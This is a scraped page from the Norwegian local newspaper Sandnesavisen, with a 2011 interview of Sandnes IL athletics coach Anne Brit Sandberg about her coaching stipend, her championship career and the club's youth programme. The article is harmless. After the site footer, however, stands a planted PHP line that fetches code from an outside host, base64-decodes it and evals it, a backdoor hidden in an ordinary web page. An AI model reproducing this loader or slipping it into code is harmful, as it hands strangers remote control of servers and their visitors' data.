Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Stipend til ildsjel
Skrevet av Trond Anfinnsen   
sndag 10. april 2011
Anne Brit Sandberg i Sandnes IL har fått stipend fra Norges Friidrettsforbund, og hovedsponsor NECON, for utrettelig innsats som trener i klubben. Ifølge juryen representerer hun en trenerfilosofi som bidrar til å både utvikle og beholde medlemmer i klubben

Stipend til ildsjel
Anne Brit Sandberg i Sandnes IL har fått stipend fra Norges Friidrettsforbund

- Det var litt overraskende da jeg ble tilkalt for å ta imot stipendet. Det var under ungdomsmesterskap i Trondheim, sier Sandberg. Hun leser selv opp kriteriene juryen har fulgt:

- Treneren skal få medlemmene i klubben til å fortsette med friidrett, skal være inspirerende og stadig på jakt etter å utvikle seg videre. Vedkommende skal være nysgjerrig på hva det er som gjør at ungdom utvikler seg og presterer i friidrett, og skal også ha vært engasjert i klubbarbeid i flere år, og bidra aktivt til at klubben er levende og positiv for lokalmiljøet.

- Kjenner du deg igjen i disse kriteriene?

- Tja..., sier Sandberg, og grubler litt over saken.

- Målet må jo være at ungdommene trives og får positiv feedback og at de får hjelp til å videreutvikle seg innen den øvelsen de satser på. En annen viktig detalj er at alle "blir sett" og føler seg viktig på treningen. Hver og en av utøverne blir fulgt opp individuelt, spekulerer hun.

Merittliste
Treneren har selv vært en aktiv utøver innen friidrett, og har en imponerende karriere bak seg. For de som ikke er bevandret i friidretten på åtti- og tidlig nittitall kan vi nevne at hun har fire NM-gull i sjukamp det tiåret. I 100 meter hekk sikret hun seg NM-gull tre sammenhengende år i 1988, 1989 og 1990, og i årene 1987, 1991 og 1993 fikk hun NM-gull i lengde. Det blir elleve gull til sammen, og listen med sølv og bronse er akkurat like lang. I 1990 ble hun hedret med "gullmedaljen" for sin høye oppnådde resultater over flere år. I 1992 deltok hun for Norge under sommer-OL i Barcelona.

- Hva var det som gjorde at du selv begynte med friidrett i sin tid?

- Jeg begynte da jeg var tretten år. Jeg var aktiv i mange forskjellige idretter og aktiviteter, og valgte til slutt friidrett. Det var en idrett som jeg behersket godt, samtidig som jeg syntes det var veldig kjekt. Når du driver med en individuell idrett, så må du sette deg egne mål. Det handler nok om det å stadig forbedre seg, og å stadig nå høyere mål alene. Det er det som skiller friidretten ut fra lagidretten.

Fokus på detaljene
Med sin allsidige bakgrunn innen sjukamp, kjenner Sandberg friidrett på kroppen, bokstavlig talt. Hennes trenerrolle er da også å se på de tekniske detaljene hos utøverne.

- Jeg er det som kalles en teknisk trener, og inngår i et trenerteam. Egentlig var det ikke bare jeg som skulle fått dette stipendet, sier Sandberg, og trekker fram hovedtrenerne Marit Toogood, Trond Gramstad, Anne Lise Willassen og sprinttreneren for de eldste, Trond Lindanger.

- Jeg jobber på tvers av disse.

- Hva vil det si å være teknisk trener?

- Det handler å hjelpe utøverne til å få bedre teknikker slik at de oppnår bedre resultater. Det er lettere å overføre til utøverne når jeg har utøvet det selv. Dersom en ungdom vil satse på en øvelse, så ønsker jeg videreføre den kompetansen jeg har. Mange trenere er gode på basistrening, men det er få som er dyktige tekniske trenere på spesifikke øvelser. Hver utøver får sine egne arbeidsoppgaver å kunne utvikle seg videre. Noen må jobbe med kneløft, andre med armbevegelsen osv. Det er min oppgave å se på hva hver enkelt må jobbe med, altså detaljene i utformingen, sier Sandberg.

Trener også egne barn
I det daglige er vinneren av stipendet ansatt på BI som studiesjef, og beskjeftiger seg der med både ledelse, økonomi og markedsføring. Hun er gift og har tre barn, et tvillingpar på seksten og en jente på elleve.

- Går barna i morens fotspor når det kommer til idrett?

- Ja, guttene driver med både fotball og friidrett. Den yngste jenta driver med turn.

- Er de inspirert av moren sin?

- Tja, jeg prøver jo å hjelpe dem så godt jeg kan. Men under treningene så er jeg først og fremst  trener og ikke mor. Men de blir jo inspirert av å være med i det gode miljøet i Sandnes IL, understreker Sandberg. 

Høyt nasjonalt nivå
- Hvordan er det med egen trening da?

- Jeg holder meg i form, ikke noe mer enn det. Jeg prøver å trene to-tre ganger i uken, og da er det både joggeturer og treningsstudio. Det gir meg energi i hverdagen, sier Sandberg. Ellers ønsker hun å få med at klubben reisen på treningsleir i påsken:

- Vi trenere har gått sammen om å arrangere en treningssamling i Albufeira i Portugal i påsken. Det er helt syd i landet, nesten mot grensen til Spania. Der skal vi være ved et friidrettssenter med rundt tretti ungdommer. Det er første gang vi gjør noe sånt. Det skal bli skikkelig kjekt, og utøverne gleder seg veldig, forsikrer Sandberg. Hun trekker ellers fram at Sandnes IL holder et høyt nasjonalt nivå:

- På norgesmesterskapet for ungdom nå sist helg tok vi femten medaljer på øvelser som 60 m hekk, høyde, stav, kule, 200 m, 800 m og 1500 m. Så mange har vi aldri tatt før. Vi trenere er svært stolte over den gode treningsiveren og arbeidet som utøverne legger ned.. Sandnes IL viser seg fram som en av de fremste friidrettsklubbene i Norge på ungdomssiden.

- Hva betyr det for deg å få dette stipendet?

- Det er kjekt og motiverende at folk ser det arbeidet som blir lagt ned. Det motiverer meg til å gjøre en enda bedre jobb, og å videreutvikle meg mer som trener, avslutter Sandberg. 

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));